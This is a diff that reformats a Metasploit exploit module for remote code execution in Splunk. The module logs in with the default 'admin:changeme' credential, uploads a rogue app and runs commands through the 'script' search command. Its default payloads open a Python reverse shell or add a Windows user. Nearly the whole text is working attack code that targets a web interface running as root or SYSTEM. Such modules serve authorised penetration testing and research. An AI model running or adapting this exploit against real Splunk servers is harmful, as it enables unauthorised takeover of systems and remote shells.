@@ -9,79 +9,89 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'           => 'Splunk Custom App Remote Code Execution',
-      'Description'    =>
-        'This module exploits a feature of Splunk whereby a custom application can be
-        uploaded through the web based interface. Through the \'script\' search command a
-        user can call commands defined in their custom application which includes arbitrary
-        perl or python code. To abuse this behavior, a valid Splunk user with the admin
-        role is required. By default, this module uses the credential of "admin:changeme",
-        the default Administrator credential for Splunk. Note that the Splunk web interface
-        runs as SYSTEM on Windows, or as root on Linux by default. This module has been
-        tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.
-        Version 7.2.4 has been tested successfully against OSX as well',
-      'Author'         =>
-        [
-          "marcwickenden",  # discovery and metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'Splunk Custom App Remote Code Execution',
+        'Description' => %q{
+          This module exploits a feature of Splunk whereby a custom application can be
+          uploaded through the web based interface. Through the 'script' search command a
+          user can call commands defined in their custom application which includes arbitrary
+          perl or python code. To abuse this behavior, a valid Splunk user with the admin
+          role is required. By default, this module uses the credential of "admin:changeme",
+          the default Administrator credential for Splunk. Note that the Splunk web interface
+          runs as SYSTEM on Windows, or as root on Linux by default. This module has been
+          tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.
+          Version 7.2.4 has been tested successfully against OSX as well
+        },
+        'Author' => [
+          "marcwickenden", # discovery and metasploit module
           "sinn3r",         # metasploit module
           "juan vazquez",   # metasploit module
           "Gary Blosser",   # metasploit module updates for Splunk 6.1
           "Matteo Malvica"  # metasploit module updates for Splunk 7.2.4
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html' ],
           [ 'URL', 'http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html' ],
           [ 'URL', 'http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script' ]
         ],
-      'Payload'        =>
-        {
-          'Space'       => 1024,
+        'Payload' => {
+          'Space' => 1024,
           'DisableNops' => true
         },
-      'Platform'       => %w(linux unix win osx),
-      'Targets'        =>
-        [
-          [ 'Splunk >= 7.2.4 / Linux',
+        'Platform' => %w(linux unix win osx),
+        'Targets' => [
+          [
+            'Splunk >= 7.2.4 / Linux',
             {
-              'Arch'     => ARCH_CMD,
+              'Arch' => ARCH_CMD,
               'Platform' => %w(linux unix),
-              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
             }
           ],
-          [ 'Splunk >= 7.2.4 / Windows',
+          [
+            'Splunk >= 7.2.4 / Windows',
             {
-              'Arch'     => ARCH_CMD,
-              'Platform' =>  'win',
-              'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'}
-            }
-          ],
-          [ 'Splunk >= 7.2.4 / OSX',
-            {
-              'Arch'     => ARCH_CMD,
-              'Platform' => %w(linux unix),
-              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
-            }
-          ],
-          [ 'Splunk >= 5.0.1 / Linux',
-            {
-              'Arch'     => ARCH_CMD,
-              'Platform' => %w(linux unix),
-              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
-            }
-          ],
-          [ 'Splunk >= 5.0.1 / Windows',
-            {
-              'Arch'     => ARCH_CMD,
+              'Arch' => ARCH_CMD,
               'Platform' => 'win',
-              'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'}
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }
+            }
+          ],
+          [
+            'Splunk >= 7.2.4 / OSX',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w(linux unix),
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+            }
+          ],
+          [
+            'Splunk >= 5.0.1 / Linux',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w(linux unix),
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+            }
+          ],
+          [
+            'Splunk >= 5.0.1 / Windows',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/adduser' }
             }
           ]
         ],
-      'DisclosureDate' => '2012-09-27'))
+        'DisclosureDate' => '2012-09-27',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
@@ -94,8 +104,10 @@ class MetasploitModule < Msf::Exploit::Remote
             true,
             'The "rogue" Splunk application tgz',
             File.join(Msf::Config.install_root, 'data', 'exploits', 'splunk', 'upload_app_exec.tgz')
-          ])
-      ])
+          ]
+        )
+      ]
+    )
 
     register_advanced_options(
       [
@@ -103,7 +115,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptBool.new('DisableUpload', [ true, 'Disable the app upload if you have already performed it once', false ]),
         OptBool.new('EnableOverwrite', [true, 'Overwrites an app of the same name. Needed if you change the app code in the tgz', false]),
         OptInt.new('CommandOutputDelay', [true, 'Seconds to wait before requesting command output from Splunk', 5])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -153,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    if  @ver7 == false
+    if @ver7 == false
       # get the next csrf token from our new app
       do_get_csrf("/en-US/app/#{app_name}/flashtimeline")
     end
@@ -162,39 +175,39 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Invoking script command")
     if @ver7 == true
       res = send_request_cgi(
-      'uri'     => '/en-US/splunkd/__raw/servicesNS/admin/search/search/jobs',
-      'method'  => 'POST',
-      'cookie' => "#{@auth_cookies};", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
-      'headers' =>
-        {
-          'X-Requested-With' => 'XMLHttpRequest',
-          'X-Splunk-Form-Key' => @splunkweb_csrf_token_8000_id   # Version 6 ignores extra headers (verified)
-        },
-      'vars_post' =>
-        {
-          'search' => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf
-          'status_buckets' => "300",
-          'namespace' => "#{app_name}",
-          'ui_dispatch_app' => "#{app_name}",
-          'ui_dispatch_view' => "flashtimeline",
-          'auto_cancel' => "100",
-          'wait' => "0",
-          'required_field_list' => "*",
-          'adhoc_search_level' => "smart",
-          'earliest_time' => "0",
-          'latest_time' => "",
-          'timeFormat' => "%s.%Q"
-        }
-    )
-    else
-      res = send_request_cgi(
-        'uri'     => '/en-US/api/search/jobs',
-        'method'  => 'POST',
-        'cookie'  => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
+        'uri' => '/en-US/splunkd/__raw/servicesNS/admin/search/search/jobs',
+        'method' => 'POST',
+        'cookie' => "#{@auth_cookies};", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
         'headers' =>
           {
             'X-Requested-With' => 'XMLHttpRequest',
-            'X-Splunk-Form-Key' => @csrf_form_key   # Version 6 ignores extra headers (verified)
+            'X-Splunk-Form-Key' => @splunkweb_csrf_token_8000_id # Version 6 ignores extra headers (verified)
+          },
+        'vars_post' =>
+          {
+            'search' => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf
+            'status_buckets' => "300",
+            'namespace' => "#{app_name}",
+            'ui_dispatch_app' => "#{app_name}",
+            'ui_dispatch_view' => "flashtimeline",
+            'auto_cancel' => "100",
+            'wait' => "0",
+            'required_field_list' => "*",
+            'adhoc_search_level' => "smart",
+            'earliest_time' => "0",
+            'latest_time' => "",
+            'timeFormat' => "%s.%Q"
+          }
+      )
+    else
+      res = send_request_cgi(
+        'uri' => '/en-US/api/search/jobs',
+        'method' => 'POST',
+        'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
+        'headers' =>
+          {
+            'X-Requested-With' => 'XMLHttpRequest',
+            'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified)
           },
         'vars_post' =>
           {
@@ -221,8 +234,8 @@ class MetasploitModule < Msf::Exploit::Remote
         job_id_blob2 = job_id_blob.split('>')[1]
         job_id = job_id_blob2.split('<')[0]
       else
-      res.body.match(/data":\ "([0-9.]+)"/)
-      job_id = Regexp.last_match(1)
+        res.body.match(/data":\ "([0-9.]+)"/)
+        job_id = Regexp.last_match(1)
       end
       # wait a short time to let the output be produced
       print_status("Waiting for #{command_output_delay} seconds to retrieve command output")
@@ -252,10 +265,11 @@ class MetasploitModule < Msf::Exploit::Remote
     # all versions are actually "vulnerable" but check implemented for future proofing
     # and good practice
     res = send_request_cgi(
-    {
-      'uri'     => '/en-US/account/login',
-      'method'  => 'GET'
-    }, 25)
+      {
+        'uri' => '/en-US/account/login',
+        'method' => 'GET'
+      }, 25
+    )
 
     if res && res.body =~ /Splunk Inc\. Splunk/
       return Exploit::CheckCode::Detected
@@ -268,14 +282,14 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Authenticating...")
     # this method borrowed with thanks from splunk_mappy_exec.rb
     res = send_request_cgi(
-      'uri'     => '/en-US/account/login',
-      'method'  => 'GET'
+      'uri' => '/en-US/account/login',
+      'method' => 'GET'
     )
 
     cval = ''
     uid = ''
     session_id_port =
-    session_id = ''
+      session_id = ''
     if res && res.code == 200
       res.get_cookies.split(';').each do |c|
         c.split(',').each do |v|
@@ -294,9 +308,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res = send_request_cgi(
-      'uri'     => '/en-US/account/login',
-      'method'  => 'POST',
-      'cookie'  => "uid=#{uid}; #{session_id_port}=#{session_id}; cval=#{cval}",
+      'uri' => '/en-US/account/login',
+      'method' => 'POST',
+      'cookie' => "uid=#{uid}; #{session_id_port}=#{session_id}; cval=#{cval}",
       'vars_post' =>
         {
           'cval' => cval,
@@ -308,47 +322,47 @@ class MetasploitModule < Msf::Exploit::Remote
     if !res
       fail_with(Failure::Unreachable, "No response")
     elsif res.code != 200
-       fail_with(Failure::Unreachable, "Authentication failed")
+      fail_with(Failure::Unreachable, "Authentication failed")
 
     elsif @ver7 == true
-        splunkweb_csrf_token_8000_port = ''
-        @splunkweb_csrf_token_8000_id = ''
-        splunkd_8000_port = ''
-        splunkd_8000_id = ''
+      splunkweb_csrf_token_8000_port = ''
+      @splunkweb_csrf_token_8000_id = ''
+      splunkd_8000_port = ''
+      splunkd_8000_id = ''
 
-        #puts res
-        res.get_cookies.split(';').each do |c|
-          c.split(',').each do |v|
-            if v.split('=')[0] =~ /splunkweb_csrf_token_8000/
-              splunkweb_csrf_token_8000_port = v.split('=')[0]
-              @splunkweb_csrf_token_8000_id = v.split('=')[1]
-            elsif v.split('=')[0] =~ /splunkd_8000/  # regex as the full name is something like splunkweb_csrf_token_8000
-              splunkd_8000_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
-              splunkd_8000_id = v.split('=')[1]
-            end
-          end
-        @auth_cookies = "session_id_8000=37305a4fb182fadd28a1591b64a0b22b0765159e;#{splunkweb_csrf_token_8000_port}=#{@splunkweb_csrf_token_8000_id};#{splunkd_8000_port}=#{splunkd_8000_id}; splunkweb_uid=30A93112-7681-4C0D-B1F6-17CAB1FA2735;login=true"
-    end
-
-    else
-        session_id_port = ''
-        session_id = ''
-        res.get_cookies.split(';').each do |c|
-          c.split(',').each do |v|
-            if v.split('=')[0] =~ /session_id/
-              session_id_port = v.split('=')[0]
-              session_id = v.split('=')[1]
-            end
+      # puts res
+      res.get_cookies.split(';').each do |c|
+        c.split(',').each do |v|
+          if v.split('=')[0] =~ /splunkweb_csrf_token_8000/
+            splunkweb_csrf_token_8000_port = v.split('=')[0]
+            @splunkweb_csrf_token_8000_id = v.split('=')[1]
+          elsif v.split('=')[0] =~ /splunkd_8000/ # regex as the full name is something like splunkweb_csrf_token_8000
+            splunkd_8000_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
+            splunkd_8000_id = v.split('=')[1]
           end
         end
-        @auth_cookies = "#{session_id_port}=#{session_id}"
+        @auth_cookies = "session_id_8000=37305a4fb182fadd28a1591b64a0b22b0765159e;#{splunkweb_csrf_token_8000_port}=#{@splunkweb_csrf_token_8000_id};#{splunkd_8000_port}=#{splunkd_8000_id}; splunkweb_uid=30A93112-7681-4C0D-B1F6-17CAB1FA2735;login=true"
+      end
+
+    else
+      session_id_port = ''
+      session_id = ''
+      res.get_cookies.split(';').each do |c|
+        c.split(',').each do |v|
+          if v.split('=')[0] =~ /session_id/
+            session_id_port = v.split('=')[0]
+            session_id = v.split('=')[1]
+          end
+        end
+      end
+      @auth_cookies = "#{session_id_port}=#{session_id}"
     end
   end
 
   def do_upload_app(app_name, file_name)
     archive_file_name = ::File.basename(file_name)
     print_status("Uploading file #{archive_file_name}")
-    file_data = ::File.read(file_name)
+    file_data = ::File.read(file_name, mode: 'rb')
 
     boundary = '--------------' + rand_text_alphanumeric(6)
 
@@ -376,7 +390,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}",
         'ctype' => "multipart/form-data; boundary=#{boundary}",
         'data' => data
-      }, 30)
+      }, 30
+    )
 
     if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
       print_good("#{app_name} successfully uploaded")
@@ -385,15 +400,15 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-   # version  7.2.x only
+  # version  7.2.x only
   def do_upload_app_7(app_name, file_name)
     archive_file_name = ::File.basename(file_name)
     print_status("Uploading file #{archive_file_name}")
-    file_data = ::File.read(file_name)
+    file_data = ::File.read(file_name, mode: 'rb')
 
     boundary = '---------------------------' + rand_text_numeric(29)
 
-    data =  "--#{boundary}\r\n"
+    data = "--#{boundary}\r\n"
     data << "Content-Disposition: form-data; name=\"state\"\r\n"
     data << "\r\n#{@state_token}\r\n"
     data << "--#{boundary}\r\n"
@@ -415,7 +430,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'cookie' => @auth_cookies,
         'ctype' => "multipart/form-data; boundary=#{boundary}",
         'data' => data
-      }, 30)
+      }, 30
+    )
 
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
@@ -430,13 +446,12 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_good("#{app_name} successfully uploaded")
-
   end
 
   def do_get_csrf(uri)
     print_status("Fetching csrf token from #{uri}")
     res = send_request_cgi(
-      'uri'    => uri,
+      'uri' => uri,
       'method' => 'GET',
       'cookie' => @auth_cookies
     )
@@ -446,7 +461,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless @csrf_form_key # Version 6
       res.get_cookies.split(';').each do |c|
         c.split(',').each do |v|
-          if v.split('=')[0] =~ /splunkweb_csrf_token/  # regex as the full name is something like splunkweb_csrf_token_8000
+          if v.split('=')[0] =~ /splunkweb_csrf_token/ # regex as the full name is something like splunkweb_csrf_token_8000
             @csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
             @csrf_form_key = v.split('=')[1]
           end
@@ -460,11 +475,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def do_get_state_token(uri)
     print_status("Fetching state token from #{uri}")
     res = send_request_cgi(
-      'uri'    => uri,
+      'uri' => uri,
       'method' => 'GET',
       'cookie' => @auth_cookies
     )
-    #puts res
+    # puts res
     res.body.match('name=\"state\" value="(.*)"') # Version 5
     @state_token = Regexp.last_match(1)
 
